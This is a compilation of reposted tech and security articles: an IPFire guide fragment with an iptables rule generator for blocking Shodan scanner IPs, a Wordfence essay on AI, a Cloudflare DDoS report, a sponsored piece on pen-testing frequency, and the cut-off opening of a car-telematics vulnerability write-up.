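This guide targets the IPFire web UI, but the same blocklist idea is easy to sketch for a generic Linux host. The snippet below emits iptables DROP commands for a small sample of the scanner IPs listed above; review before running, and prefer ipset for large lists.

```python
# Outside IPFire's web UI, the same idea on a generic Linux host:
# emit iptables DROP rules for a few of the scanner IPs listed above.
# (Sample subset only; -I places rules ahead of existing ACCEPTs.)
SHODAN_SCANNERS = [
    "198.20.69.74",    # census1.shodan.io
    "198.20.69.98",    # census2.shodan.io
    "71.6.146.185",    # pirate.census.shodan.io
]

for ip in SHODAN_SCANNERS:
    print(f"iptables -I INPUT -s {ip} -j DROP")
```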

Enter a comment, if you want to and hit “add” to set the new firewall rule.

Please make sure that this rule is placed before rules which accept something (i.e. port forwarding rules) so that shodan scan traffic will be blocked instantly.

Reload the firewall engine to apply the new rule.

Limitations of this rule

The OpenVPN service will not be protected – the OVPNINPUT firewall chain sits above the chain where this rule will land.

Limitations of this guide

Nobody (and nothing) is perfect. This guide isn’t either. 😉

For example, if the IP addresses of the Shodan scanners change, your firewall rule will probably become useless and no longer provide any protection against the scanners. Consider setting up an IPS for additional protection, since some rules there will also block other scanners which are not mentioned here.

Blocking Shodan scanners is fine, but I want to block all scanners
This is basically possible. However, it is a nightmare to set up a firewall host group which covers all IPs belonging to scanners. (And it is also a nightmare to find those IP addresses, since most scanners do not simply publish them on their web sites…) If you are thinking along these lines, setting up an IPS in combination with suitable rules (this is just one example; there are many out there) might be a solution for you.

Source :
https://wiki.ipfire.org/configuration/firewall/blockshodan

Friday Long Read: What To Do About AI

This is a Friday long-read, so grab a warm cup of something and kick back because we’re going to take our time on this. The world is about to profoundly change. I know you’re nervous – perhaps excited and optimistic, but if you’ve been paying attention and have been watching the trajectory of this thing, the rational reaction is to be nervous. In this post I’d like to unpack in practical and tangible terms what AI is, where it came from, and the state of play, and then I’ll show you a path that will give you a pretty good shot at surviving the coming revolution.

Who am I? I’m Mark Maunder and I founded Wordfence in 2011 and wrote the early versions of the product until 2015 when Matt Barry took over as lead developer and I morphed into a tech executive running Defiant Inc, which makes Wordfence. We have over 4 million customers using our free product and a large number of paying customers using our various paid WordPress security products. I’ve been a technologist since the early 90s and a kid hacker in my teens in the 80s and 90s. I started my career in mission-critical operations for companies like Coca-Cola, Credit Suisse (now UBS), and DeBeers and then went over to do dev for companies like the BBC and eToys which was one of the biggest dot-com busts. I created the first job meta-search called WorkZoo in the UK around 2001 which later competed with Indeed, launched after us, and which I sold in 2005 but which made Time Magazine and NYTimes. I subsequently launched a Geoblogging platform, inline comments via JS, an ad network, real-time analytics, a localized news website, and more. You could say I’ve been in the innovation game for a minute, and I’m in it for life. I’m based in the USA these days in case you’re curious – moved over here in 2003.

Examining Bubbles

My apologies for the long bio, but what I’d like to illustrate is that I’ve seen tech come and go. The hype cycles I’ve seen typically include:

  • Outlandish claims about how the tech will solve everything from slicing bread to world peace and everything in between.
  • Commercial vendors jumping on the emerging mega-trend to surf the wave with proprietary technologies of their own which they position as standards, or at the very least the default choice.
  • Nascent technologies implementing the tech, that are immature, unstable, rapidly changing, and may very well be abandoned in a few months or a few years.
  • The press contracting a bad case of rabies and foaming at the mouth about the tech, amplifying the most extreme aspects and use cases and creating a lot of noise, which makes it hard for implementors to sift for the truth and the fundamentals around the technology.
  •  The investment community pouring cash into the space with little focus. This creates an extremely adversarial environment for tech practitioners who are building fundamental value, who now have to compete with powerful VC-backed marketing machines.
  • As Warren Buffet says, the Innovators, the Imitators, and the Swarming Incompetents enter the space in that order. I’d add that they have a pyramid structure with each successive wave being at least an order of magnitude bigger than the last. Things get crowded for a while.
  • Then you have the typical bust cycle which cleans house and makes the tech uncool again, but also makes it interesting to the true believers. The VC’s go away and stop making noise that innovators have to compete against. The imitators and swarming incompetents drift off to imitate and mess up something else. The businesses not creating fundamental value fail. Some creating fundamental value fail too but the talent and tech are sometimes reincarnated into something else useful.

So who prospers, and what tech survives after a bust? Sometimes none of it, but helpful derivative technologies are created, like Java Applets in the 90s that inspired Flash which inspired standards-based rich content web browsers.

A technological phoenix rising from the ashes

Sometimes out of the ashes, an Amazon is born, as with the dot-com boom. And sometimes you have incredible innovation where the innovators never see large-scale commercial success, but others do, as with Igor Sysoev, who created Nginx, which eliminated the need for a data center full of web servers to handle large-scale websites. Igor has a commercial offering, but the real winners were companies like Cloudflare, who based their global infrastructure on Nginx, reverse proxying massive numbers of connections to origin servers with rules about what gets proxied. Hey, I benefited too. Nginx saved our behinds when Kerry and I were running Feedjit.com from 2007 to 2011 because it let us handle over 1 billion application requests per month on just 6 servers. Thanks Igor!

Blockchain technology is in a bust cycle and you can map the characteristics I defined above to blockchain. It looks eerily similar to the dot-com bust and you’ll see an Amazon emerge from the ashes about a decade from now. It might be Coinbase if they survive the over 80% dive in market cap that may continue, but who knows?

Derivative Versus Fundamental Technology Innovation

Seeing the forest for the trees

I’ve mentioned a few tech bubbles so far and it’s really the first step in pulling us out of the trees so that we can examine the various forests out there. Now let’s go a little more meta and talk about which forests matter. Some technology is derivative. Examples of derivative tech are new stuff that runs inside a browser, for example, WebSockets.

WebSockets are awesome because they let a browser keep a connection open and get push notifications without doing the old TCP three-way handshake to establish a new connection every time the browser wants to check if there’s data waiting on a chat server or whatever. We used to call this long-polling, and I wrote a web server to do long polling, which was a clumsy but necessary approach; so when WebSockets came along, we all breathed a sigh of relief and I happily retired my web server, glad that no one would see my nasty source code – which worked quite well, mind you.
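
For the curious, here is roughly what that push pattern looks like from Python, using the third-party websockets library; the server URL is a placeholder.

```python
# Minimal WebSocket client sketch (pip install websockets).
# The URL is a placeholder, not a real endpoint.
import asyncio
import websockets

async def listen():
    # One connection stays open; the server pushes messages whenever
    # it likes -- no new TCP handshake per poll, unlike long-polling.
    async with websockets.connect("wss://example.com/chat") as ws:
        async for message in ws:
            print("pushed from server:", message)

asyncio.run(listen())
```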

Another derivative technology – and you’re not going to like this – is blockchain. It’s a useful and novel implementation of hashing algorithms and a few other cryptographic tricks, but honestly, we should have disintermediated banking at least two decades ago and the fact that blockchain has still failed to do that is both disappointing and illustrative that it is just a set of derivative applications built on a tower of fundamentals that has a way to go before it matures. The hype cycle and speculative bubble around it was simply humans making human noise.

So that’s derivative tech. In addition to derivative tech, you have what I’d like to call fundamental tech. Electricity is fundamental. It’s cornerstone technology that transformed the world in our ability to use and transport energy which has enabled an industrial and technological revolution the likes of which the world has never seen. The microprocessor is also fundamental tech for similar reasons. You have algorithms that are fundamental tech like the RSA algorithm which allows us to establish a secure communication channel while a bad person is listening in the whole time – the kind of tech that could have changed the outcome of World War II.

The Internet is fundamental tech. It connected the world and gave us the ability to build applications on top like HTTP and the web which are derivative tech.

Oh I know you want to have a bar fight with me at this point and we’ll do that if you’re attending Wordcamp EU – a collegial and metaphorical barfight, that is – but hopefully, you’re picking up what I’m putting down here in a general sense: There is fundamental tech that profoundly enables and changes the world and which many other things are built on top of, and there is derivative tech that gets a lot of attention but isn’t quite as transformative in a historical sense if you’re thinking in terms of centuries. And there’s the big fat grey area in between.

Neural nets sitting at desks in a classroom learning math

AI is fundamental tech. For decades we have been programming by writing functions by hand. We’ve gotten quite good at structuring our code using metaphors like object-oriented programming to create logical structures that make sense in a human world, and help us organize large code bases. But fundamentally the way we define logic in a program hasn’t changed for a long time. Until now. For the first time in all of history, we can create functions in programming by training them, rather than writing them by hand. In other, slightly more technical words, we can infer a function from observations and then use it. Like babies and toddlers do. This is historic, it’s transformative and it is a fundamental breakthrough.
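
Here is that idea in miniature: instead of hand-coding y = 2x + 1, we infer the weights from observations with a few lines of gradient descent. A toy sketch, not a real training loop.

```python
# "Training a function instead of writing it": we never hand-code
# y = 2x + 1; we infer w and b from observed (x, y) pairs.
observations = [(0, 1), (1, 3), (2, 5), (3, 7)]  # samples of y = 2x + 1

w, b = 0.0, 0.0            # start from an uninformed guess
lr = 0.05                  # learning rate

for step in range(2000):
    for x, y in observations:
        pred = w * x + b           # the "function" being learned
        err = pred - y
        w -= lr * err * x          # gradient descent on squared error
        b -= lr * err

print(f"learned w={w:.2f}, b={b:.2f}")   # converges to ~2.00 and ~1.00
```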

Funny thing is that until quite recently – around 2015 – AI had suffered many so-called “AI Winters”: a surge of interest in the field would catalyze investment dollars, and then a setback, usually caused by a reality check, would freeze funding and interest. Does anyone remember the “expert systems” of the 80s? By the early 2000s, AI’s name had been dragged through the mud so many times that anyone doing serious research in the field used different words to describe their work, like “machine learning” or “informatics” or “knowledge systems”.

A few hardcore true believers like Yann LeCun, Yoshua Bengio and Geoffrey Hinton powered through like Frodo and Sam across the Dead Marshes and went on to win the Turing Award, which is basically the Nobel Prize of computer science and which I had the privilege of attending when Rivest, Adleman and Shamir won theirs for public key crypto. The Turing Award is a very big deal and well deserved considering how adversarial the AI environment was for a while.

So what changed? Well for one thing you’re reading this post because it’s about AI and you’re interested. And you’re interested because you recently used GPT-4, MidJourney, Dall-E or another model to create something. You’re seeing tangible results. And the reason you’re seeing results is that GPU hardware, algorithms, and an interest in the field have brought us to an inflection point where the technology is delivering results that are jaw-dropping enough to catalyze more funding, more research, and more jaw-dropping results. This cycle really picked up steam in 2015, and with the release of GPT-4 recently, has entered a phase of what I would describe as true and consistent exponential growth.

According to NVIDIA, “LLM sizes have been increasing 10X every year for the last few years”. In two years that’s 100X. Three years from now that’s 1000X and so on. Extrapolate that out and be afraid. Or optimistic if your mind isn’t for rent and you are hopeful yet discontent. Rush lyrics aside, that pace should give you an idea of how quickly this thing is coming. And now that we’ve reached the point of inflection I mentioned, where the hardware and algorithms seem to have overcome the cycle of disappointment that AI has been stuck in for decades, I predict that you’ll see consistent and exponential growth in the field in capabilities for the foreseeable future, with a financial bubble and bust in there that won’t be of much consequence to the fundamental value of the technology.

“Thanks for the history lesson Maunder, but you brought us here with promises of telling us what to do about AI. So?”

What to do about AI

So far we’ve discussed what boom cycles look like and the kind of noise and bear traps you should be aware of. We’ve defined what AI is in fundamental terms – a function that you can train rather than hand code. And we’ve hopefully agreed that we’ve entered a period of consistent and exponential growth in the field. Now we’ll chat about how to survive and prosper in a world that looks a lot like when electricity was invented and commercialized, or the microprocessor, or the Internet.

Disruption

Goldman estimates that AI will add 7% to global GDP at a rate of about 1.5% growth per year. They also estimate that roughly two-thirds of US occupations are exposed to some degree of automation by AI. You can extrapolate this globally. That kind of global disruption is matched only by the industrial revolution or the entire recent tech revolution as a whole starting from 1980. From the same publication, “A recent study by economist David Autor cited in the report found that 60% of today’s workers are employed in occupations that didn’t exist in 1940.” So on an optimistic note, this kind of disruption isn’t a new thing and we’ve been disrupting and adapting for some time now.

Perhaps you’re reading this because you are running a WordPress website, perhaps secured by my product, Wordfence. Which means you’re a creator of some kind. Perhaps you’re a writer, an artist, or perhaps you’re an entrepreneur creating a business out of thin air. [Yes my fellow entreps, you get to hang with the other cool creator kids too!!]. If you don’t plan on adapting at all, that makes you far more vulnerable to this coming wave than say a chef who runs a restaurant, or someone who manages real estate and rentals. And that really is the key: adaptation. So how can we adapt?

If you’re a creator, you need to become a user of AI. You’re probably already using GPT to write copy for your product catalogs on your e-commerce website, or using MidJourney (MJ) or Dall-E to create art for ad campaigns. If you’re a designer or artist, you may feel the kind of resentment this Blender artist does in the Blender subreddit.

“My Job is different now since Midjourney v5 came out last week. I am not an artist anymore, nor a 3D artist. Rn all I do is prompting, photoshopping and implementing good looking pictures. The reason I went to be a 3D artist in the first place is gone. I wanted to create form In 3D space, sculpt, create. With my own creativity. With my own hands.”

“It came over night for me. I had no choice. And my boss also had no choice. I am now able to create, rig and animate a character thats spit out from MJ in 2-3 days. Before, it took us several weeks in 3D. The difference is: I care, he does not. For my boss its just a huge time/money saver.”

While I sympathize with how hard change and disruption can be, it’s been a constant for the past couple of centuries in many fields. MidJourney has a long way to go before it can match a real-world artist, unless you’re just churning out images and letting the AI guide the design choices and are happy to work around the bugs. For MidJourney and other generative AIs to produce exactly what we want, they’re going to have to get better at understanding what exactly we want to create. And that’s where the skill comes in. You’re already seeing this with a document that someone has created listing famous photographers and examples of their look. This can be used in MJ prompts to say “in the style of” to get a specific look, but it is an incredibly rudimentary approach.

Midjourney trying to do hands

Another way to guide the MJ AI in particular is to blend photos it has generated. Again, super rudimentary, but it’s the start of having the ability to tightly specify exactly what you want and get that out of MJ. And if you need a reminder of how basic it still is, try to get MJ to generate hands. It still sucks, even at version 5.

So if you’re a creator, start getting good at using the tools now, understand their limitations, and evolve as the products evolve until you’re an expert at guiding the AI to create exactly what you want. This will help you guide your customers in explaining the limits of the current state of AI to them and where you add value, let you take immediate advantage of the use that the current tools have, and ramp up your productivity as the tools get better at taking instructions from you.

This applies to writers, artists, designers, filmmakers, photographers, screenwriters, and anyone with creative output. Get good at the tools. Get good at them now. Do it with an open mind. Know that changes aren’t permanent and that change is. (Again with sneaking in the Rush lyrics)

Adapting as a Dev

Coders! My people! We have a problem. Most of you have become users of AI. You’re users of GPT-4 via their API. You’re plugging into other generative AIs via an API. You aren’t rolling your own. And rolling your own is where all the fun is!!

A leaking Llama

Ever heard of transfer learning? You can grab a pre-trained model from Hugging Face, chop off the head – aka the final layer in the layers of neural nets – substitute it with random weights, and train the pre-trained model with your own data to take advantage of the sometimes millions of dollars that someone else already spent training their model. In fact, Facebook’s LLaMA model, which is one of the largest LLMs in the world, was leaked via torrent recently.
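
Here is what that head-chopping looks like in a minimal PyTorch/torchvision sketch; the 10-class head is an arbitrary example, and the training loop is omitted.

```python
# Minimal transfer-learning sketch (pip install torch torchvision):
# take a pretrained ResNet, freeze its body, and swap in a new head.
import torch.nn as nn
from torchvision import models

model = models.resnet18(weights=models.ResNet18_Weights.DEFAULT)

for param in model.parameters():
    param.requires_grad = False        # keep the pretrained weights

# Replace the final layer with fresh, randomly initialized weights;
# only this head gets trained on your own data (10 classes here).
model.fc = nn.Linear(model.fc.in_features, 10)
```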

The most important thing you need to do right now as a developer is to stop being a user of AI and become a dev of AI. GPT-4 is a shiny ball that the world will have forgotten about in a year, but it’s a very shiny and attractive ball right now that is fueling many a late-night dev chat. Remember that stat I gave you above? That LLMs have been increasing in size at 10X per year. The current state of the art will be accessible to you on a desktop in a few years and you need to get ready for that world today.

I’m going to just go ahead and tell you what you need to do to get your AI stuff together, fast.

  • Ignore the math. Trust me on this. Most people including devs are not good at math and it intimidates the hell out of them. AI is just matrix multiplication and addition using GPU cores to parallelize the ops (see the quick sketch after this list). Expressing this as code is easy. Expressing it as math will make you hide under your bed and cry. Ignore the math. If you can code, you’ll get it.
  • Learn Python. Everything in AI is Python. It’s a beautiful little language that you’ll come to appreciate very quickly if you’re already a dev. It’s like coming over to Aikido if you’re already a black belt. OK the MMA scene kinda messed up my metaphor proving that Aikido is actually worthless, but whatever.
  • Then go do the Practical Deep Learning for Coders course at fast.ai. It’s how we get our guys up to speed fast in the field and it’s brilliant. Jeremy Howard does a spectacular job of getting you up to speed fast in the field by immediately getting you productive and then unpacking the details in a fun non-mathy way.
  • As you progress in the course, definitely get up to speed using Jupyter Notebooks and I’d recommend Kaggle for this. They were bought by Google a few years ago and kind of compete with Google’s own notebook system called Colab, but I prefer Kaggle. You get GPU access by simply verifying your email address and it’s free which is kind of amazing. So you can use a rich text environment on Kaggle to write your code, see the output and run it on some fairly decent GPUs. Kaggle GPUs perform at about 20% of the speed of my laptop RTX 4090 in case you’re curious about benchmarks.
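
And here is bullet one in code: a neural-net layer really is just a matrix multiply plus an addition, with a simple nonlinearity on top (NumPy, toy shapes).

```python
# Bullet one, in code: one neural-net layer is matrix multiplication
# and addition, followed by a simple nonlinearity. Toy shapes only.
import numpy as np

x = np.random.randn(1, 4)      # one input with 4 features
W = np.random.randn(4, 3)      # learned weights: 4 inputs -> 3 outputs
b = np.random.randn(3)         # learned biases

layer_output = np.maximum(0, x @ W + b)   # ReLU(xW + b)
print(layer_output)
```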

The course teaches fundamentals, how to use pre-trained models, how to create Jupyter Notebooks or fork others, how to create Hugging Face Spaces, and how to share your models and their output with the world. It is the fastest way right now to transform yourself from an AI user into an AI dev and get drinks bought for you at parties by folks that have not yet made the leap.

Alright, this went long but that was the plan. We’ll talk more about AI. Go forth, be brave, learn, and create!

Mark Maunder – Founder & CEO – Wordfence and Defiant Inc.

Footnotes: All images on the page were created with MidJourney and if you’d like to see the prompt I used, simply view the image in a new tab and the image name is the prompt, all except for the heavy metal hands image which a colleague created. I’ll be in the comments in case there’s discussion.


Source :
https://www.wordfence.com/blog/2023/04/friday-long-read-what-to-do-about-ai/

Cloudflare mitigates record-breaking 71 million request-per-second DDoS attack

This was a weekend of record-breaking DDoS attacks. Over the weekend, Cloudflare detected and mitigated dozens of hyper-volumetric DDoS attacks. The majority of attacks peaked in the ballpark of 50-70 million requests per second (rps), with the largest exceeding 71 million rps. This is the largest reported HTTP DDoS attack on record, more than 54% higher than the previous reported record of 46M rps in June 2022.

The attacks were HTTP/2-based and targeted websites protected by Cloudflare. They originated from over 30,000 IP addresses. Some of the attacked websites included a popular gaming provider, cryptocurrency companies, hosting providers, and cloud computing platforms. The attacks originated from numerous cloud providers, and we have been working with them to crack down on the botnet.

Record breaking attack: DDoS attack exceeding 71 million requests per second

Over the past year, we’ve seen more attacks originate from cloud computing providers. For this reason, we will be providing service providers that own their own autonomous system a free botnet threat feed. The feed will give service providers threat intelligence about their own IP space: attacks originating from within their autonomous system. Service providers that operate their own IP space can now sign up to the early access waiting list.

This campaign of attacks arrived less than two weeks after the Killnet DDoS campaign that targeted healthcare websites, but based on the methods and targets, we do not believe the two are related. Furthermore, yesterday was the US Super Bowl, and we also do not believe this attack campaign is related to the game event.

What are DDoS attacks?

Distributed Denial of Service attacks are cyber attacks that aim to take down Internet properties and make them unavailable for users. These types of cyberattacks can be very efficient against unprotected websites and they can be very inexpensive for the attackers to execute.

An HTTP DDoS attack usually involves a flood of HTTP requests towards the target website. The attacker’s objective is to bombard the website with more requests than it can handle. Given a sufficiently high number of requests, the website’s server will not be able to process all of the attack requests along with the legitimate user requests. Users will experience this as website-load delays, timeouts, and eventually not being able to connect to their desired websites at all.
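To make the mechanics concrete, here is a toy sliding-window counter of the kind a mitigation layer might apply per client IP. This is purely illustrative: the threshold, window, and data structure are made up, and real mitigation systems (Cloudflare’s included) are far more sophisticated.

# Toy flood detection: count requests per client IP in a sliding window
# and reject anything beyond a threshold. All numbers are made up.
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 10
MAX_REQUESTS = 100  # per IP per window

recent = defaultdict(deque)  # ip -> timestamps of that IP's recent requests

def allow_request(ip: str) -> bool:
    now = time.monotonic()
    q = recent[ip]
    q.append(now)
    while q and now - q[0] > WINDOW_SECONDS:
        q.popleft()  # drop timestamps that fell outside the window
    return len(q) <= MAX_REQUESTS

# A flood of 500 requests from one IP trips the limiter almost immediately.
print(sum(allow_request("198.51.100.7") for _ in range(500)))  # 100 allowed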

Illustration of a DDoS attack

To make attacks larger and more complicated, attackers usually leverage a network of bots — a botnet. The attacker will orchestrate the botnet to bombard the victim’s websites with HTTP requests. A sufficiently large and powerful botnet can generate very large attacks as we’ve seen in this case.

However, building and operating botnets requires a lot of investment and expertise. What is the average Joe to do? Well, an average Joe that wants to launch a DDoS attack against a website doesn’t need to start from scratch. They can hire one of numerous DDoS-as-a-Service platforms for as little as $30 per month. The more you pay, the larger and longer the attack you’ll get.

Why DDoS attacks?

Over the years, it has become easier, cheaper, and more accessible for attackers and attackers-for-hire to launch DDoS attacks. But as easy as it has become for the attackers, we want to make sure that it is even easier – and free – for defenders of organizations of all sizes to protect themselves against DDoS attacks of all types.

Unlike Ransomware attacks, Ransom DDoS attacks don’t require an actual system intrusion or a foothold within the targeted network. Usually Ransomware attacks start once an employee naively clicks an email link that installs and propagates the malware. There’s no need for that with DDoS attacks. They are more like a hit-and-run attack. All a DDoS attacker needs to know is the website’s address and/or IP address.

Is there an increase in DDoS attacks?

Yes. The size, sophistication, and frequency of attacks have been increasing over the past months. In our latest DDoS threat report, we saw that the number of HTTP DDoS attacks increased by 79% year-over-year. Furthermore, the number of volumetric attacks exceeding 100 Gbps grew by 67% quarter-over-quarter (QoQ), and the number of attacks lasting more than three hours increased by 87% QoQ.

But it doesn’t end there. The audacity of attackers has been increasing as well. In our latest DDoS threat report, we saw that Ransom DDoS attacks steadily increased throughout the year. They peaked in November 2022, when one out of every four surveyed customers reported being subject to Ransom DDoS attacks or threats.

Distribution of Ransom DDoS attacks by month

Should I be worried about DDoS attacks?

Yes. If your website, server, or networks are not protected against volumetric DDoS attacks using a cloud service that provides automatic detection and mitigation, we really recommend that you consider it.

Cloudflare customers shouldn’t be worried, but should be aware and prepared. Below is a list of recommended steps to ensure your security posture is optimized.

What steps should I take to defend against DDoS attacks?

Cloudflare’s systems have been automatically detecting and mitigating these DDoS attacks.

Cloudflare offers many features and capabilities that you may already have access to but may not be using. So as an extra precaution, we recommend taking advantage of these capabilities to improve and optimize your security posture:

  1. Ensure all DDoS Managed Rules are set to default settings (High sensitivity level and mitigation actions) for optimal DDoS activation.
  2. Cloudflare Enterprise customers that are subscribed to the Advanced DDoS Protection service should consider enabling Adaptive DDoS Protection, which mitigates attacks more intelligently based on your unique traffic patterns.
  3. Deploy firewall rules and rate limiting rules to enforce a combined positive and negative security model. Reduce the traffic allowed to your website based on your known usage.
  4. Ensure your origin is not exposed to the public Internet (i.e., only enable access to Cloudflare IP addresses); a quick way to verify this is sketched after this list. As an extra security precaution, we recommend contacting your hosting provider and requesting new origin server IPs if they have been targeted directly in the past.
  5. Customers with access to Managed IP Lists should consider leveraging those lists in firewall rules. Customers with Bot Management should consider leveraging the threat scores within the firewall rules.
  6. Enable caching as much as possible to reduce the strain on your origin servers, and when using Workers, avoid overwhelming your origin server with more subrequests than necessary.
  7. Enable DDoS alerting to improve your response time.
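Step 4 is one of the easiest to verify yourself. As a quick sanity check, assuming you know your origin’s real IP (the address below is a placeholder), you can test whether the origin accepts direct connections from an arbitrary host at all:

# Quick check for step 4: does the origin accept direct connections from
# the open Internet? The IP below is a placeholder for your origin's IP.
import socket

ORIGIN_IP = "203.0.113.10"  # placeholder

for port in (80, 443):
    try:
        with socket.create_connection((ORIGIN_IP, port), timeout=3):
            print(f"port {port}: reachable - origin may be exposed")
    except OSError:
        print(f"port {port}: filtered or closed - good")

If both ports are filtered for hosts outside Cloudflare’s IP ranges, direct-to-origin floods have nothing to hit.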

Preparing for the next DDoS wave

Defending against DDoS attacks is critical for organizations of all sizes. While attacks may be initiated by humans, they are executed by bots — and to play to win, you must fight bots with bots. Detection and mitigation must be automated as much as possible, because relying solely on humans to mitigate in real time puts defenders at a disadvantage. Cloudflare’s automated systems constantly detect and mitigate DDoS attacks for our customers, so they don’t have to. This automated approach, combined with our wide breadth of security capabilities, lets customers tailor the protection to their needs.

We’ve been providing unmetered and unlimited DDoS protection for free to all of our customers since 2017, when we pioneered the concept. Cloudflare’s mission is to help build a better Internet. A better Internet is one that is more secure, faster, and reliable for everyone – even in the face of DDoS attacks.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet application, ward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.


Source :
https://blog.cloudflare.com/cloudflare-mitigates-record-breaking-71-million-request-per-second-ddos-attack/

Is Once-Yearly Pen Testing Enough for Your Organization?

Any organization that handles sensitive data must be diligent in its security efforts, which include regular pen testing. Even a small data breach can result in significant damage to an organization’s reputation and bottom line.

There are two main reasons why regular pen testing is necessary for secure web application development:

  • Security: Web applications are constantly evolving, and new vulnerabilities are being discovered all the time. Pen testing helps identify vulnerabilities that could be exploited by hackers and allows you to fix them before they can do any damage.
  • Compliance: Depending on your industry and the type of data you handle, you may be required to comply with certain security standards (e.g., PCI DSS, NIST, HIPAA). Regular pen testing can help you verify that your web applications meet these standards and avoid penalties for non-compliance.

How Often Should You Pentest?

Many organizations, big and small, have a once-a-year pen testing cycle. But what’s the best frequency for pen testing? Is once a year enough, or do you need to test more often?

The answer depends on several factors, including the type of development cycle you have, the criticality of your web applications, and the industry you’re in.

You may need more frequent pen testing if:

You Have an Agile or Continuous Release Cycle

Agile development cycles are characterized by short release cycles and rapid iterations. This can make it difficult to keep track of changes made to the codebase and makes it more likely that security vulnerabilities will be introduced.

If you’re only testing once a year, there’s a good chance that vulnerabilities will go undetected for long periods of time. This could leave your organization open to attack.

To mitigate this risk, pen testing cycles should align with the organization’s development cycle. For static web applications, testing every 4-6 months should be sufficient. But for web applications that are updated frequently, you may need to test more often, such as monthly or even weekly.

Your Web Applications Are Business-Critical

Any system that is essential to your organization’s operations should be given extra attention when it comes to security. This is because a breach of these systems could have a devastating impact on your business. If your organization relies heavily on its web applications to do business, any downtime could result in significant financial losses.

For example, imagine that your organization’s e-commerce site went down for an hour due to a DDoS attack. Not only would you lose out on potential sales, but you would also have to deal with the cost of the attack and the negative publicity.

To avoid this scenario, it’s important to ensure that your web applications are always available and secure.

Non-critical web applications can usually get away with being tested once a year, but business-critical web applications should be tested more frequently to ensure they are not at risk of a major outage or data loss.

Your Web Applications Are Customer-Facing

If all your web applications are internal, you may be able to get away with pen testing less frequently. However, if your web applications are accessible to the public, you must be extra diligent in your security efforts.

Web applications accessible to external traffic are more likely to be targeted by attackers. This is because there is a greater pool of attack vectors and more potential entry points for an attacker to exploit.

Customer-facing web applications also tend to have more users, which means that any security vulnerabilities will be exploited more quickly. For example, a cross-site scripting (XSS) vulnerability in an external web application with millions of users could be exploited within hours of being discovered.

To protect against these threats, it’s important to pen test customer-facing web applications more frequently than internal ones. Depending on the size and complexity of the application, you may need to pen test every month or even every week.

You Are in a High-Risk Industry

Certain industries are more likely to be targeted by hackers due to the sensitive nature of their data. Healthcare organizations, for example, are often targeted because of the protected health information (PHI) they hold.

If your organization is in a high-risk industry, you should consider conducting pen testing more frequently to ensure that your systems are secure and meet regulatory compliance. This will help protect your data and reduce the chances of a costly security incident.

You Don’t Have Internal Security Operations or a Pen Testing Team

This might sound counterintuitive, but if you don’t have an internal security team, you may need to conduct pen testing more frequently.

Organizations that don’t have dedicated security staff are more likely to be vulnerable to attacks.

Without an internal security team, you will need to rely on external pen testers to assess your organization’s security posture.

Depending on the size and complexity of your organization, you may need to pen test every month or even every week.

You Are Focused on Mergers or Acquisitions

During a merger or acquisition, there is often a lot of confusion and chaos. This can make it difficult to keep track of all the systems and data that need to be secured. As a result, it’s important to conduct pen testing more frequently during these times to ensure that all systems are secure.

M&A also means that you are adding new web applications to your organization’s infrastructure. These new applications may have unknown security vulnerabilities that could put your entire organization at risk.

In 2016, Marriott acquired Starwood without being aware that hackers had exploited a flaw in Starwood’s reservation system two years earlier. Over 500 million customer records were compromised. This placed Marriott in hot water with the British watchdog ICO, resulting in 18.4 million pounds in fines in the UK. According to Bloomberg, there is more trouble ahead, as the hotel giant could “face up to $1 billion in regulatory fines and litigation costs.”

To protect against these threats, it’s important to conduct pen testing before and after an acquisition. This will help you identify potential security issues so they can be fixed before the transition is complete.

The Importance of Continuous Pen Testing

While periodic pen testing is important, it is no longer enough in today’s world. As businesses rely more on their web applications, continuous pen testing becomes increasingly important.

There are two main types of pen testing: time-boxed and continuous.

Traditional pen testing is done on a set schedule, such as once a year. This type of pen testing is no longer enough in today’s world, as businesses rely more on their web applications.

Continuous pen testing is the process of continuously scanning your systems for vulnerabilities. This allows you to identify and fix vulnerabilities before they can be exploited by attackers. Continuous pen testing allows you to find and fix security issues as they happen instead of waiting for a periodic assessment.

Continuous pen testing is especially important for organizations that have an agile development cycle. Since new code is deployed frequently, there is a greater chance for security vulnerabilities to be introduced.

Pen-testing-as-a-service models are where continuous pen testing shines. Outpost24’s PTaaS (Penetration-Testing-as-a-Service) platform enables businesses to conduct continuous pen testing with ease. The Outpost24 platform is always up to date with an organization’s latest security threats and vulnerabilities, so you can be confident that your web applications are secure.

  • Manual and automated pen testing: Outpost24’s PTaaS platform combines manual and automated pen testing to give you the best of both worlds. This means you can find and fix vulnerabilities faster while still getting the benefits of expert analysis.
  • Comprehensive coverage: Outpost24’s platform covers all OWASP Top 10 vulnerabilities and more, so you can be confident that your web applications are secure against the latest threats.
  • Cost-effective: With Outpost24, you only pay for the services you need, which makes continuous pen testing affordable even for small businesses.

The Bottom Line

Regular pen testing is essential for secure web application development. Depending on your organization’s size, industry, and development cycle, you may need to revise your pen testing schedule.

A once-a-year pen testing cycle may be enough for some organizations, but for most, it is not. For business-critical, customer-facing, or high-traffic web applications, you should consider continuous pen testing.

Outpost24’s PTaaS platform makes it easy and cost-effective to conduct continuous pen testing. Contact us today to learn more about our platform and how we can help you secure your web applications.


Source :
https://thehackernews.com/2023/01/is-once-yearly-pen-testing-enough-for.html

Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More

During the fall of 2022, a few friends and I took a road trip from Chicago, IL to Washington, DC to attend a cybersecurity conference and (try) to take a break from our usual computer work.

While we were visiting the University of Maryland, we came across a fleet of electric scooters scattered across the campus and couldn’t resist poking at the scooter’s mobile app. To our surprise, our actions caused the horns and headlights on all of the scooters to turn on and stay on for 15 minutes straight.

https://youtube.com/watch?v=YRAy3wv5SCk%3Ffeature%3Doembed

When everything eventually settled down, we sent a report over to the scooter manufacturer and became super interested in finding more ways to make more things honk. We brainstormed for a while and then realized that nearly every automobile manufactured in the last 5 years had nearly identical functionality: if an attacker were able to find vulnerabilities in the API endpoints that vehicle telematics systems use, they could honk the horn, flash the lights, remotely track, lock/unlock, and start/stop vehicles, completely remotely.

At this point, we started a group chat and all began to work towards the goal of finding vulnerabilities affecting the automotive industry. Over the next few months, we found as many car-related vulnerabilities as we could. The following writeup details our work exploring the security of telematics systems, automotive APIs, and the infrastructure that supports them.

Findings Summary

During our engagement, we found the following vulnerabilities in the companies listed below:

  • Kia, Honda, Infiniti, Nissan, Acura
